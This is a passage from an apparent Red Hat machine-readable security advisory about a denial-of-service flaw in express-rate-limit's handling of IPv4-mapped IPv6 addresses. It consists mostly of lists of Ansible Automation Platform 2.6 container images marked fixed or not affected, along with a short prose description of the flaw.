"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445429"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in express-rate-limit. The default key generator incorrectly applies IPv6 subnet masking to IPv4-mapped IPv6 addresses, which are used when an IPv4 client connects to a dual-stack server. This misconfiguration causes all IPv4 traffic to be treated as a single entity for rate limiting. Consequently, a remote attacker can exhaust the rate limit with a single client, leading to a Denial of Service (DoS) for all other IPv4 clients by causing them to receive HTTP 429 errors.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express-rate-limit: express-rate-limit: Denial of Service for IPv4 clients due to incorrect IPv6 subnet masking",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
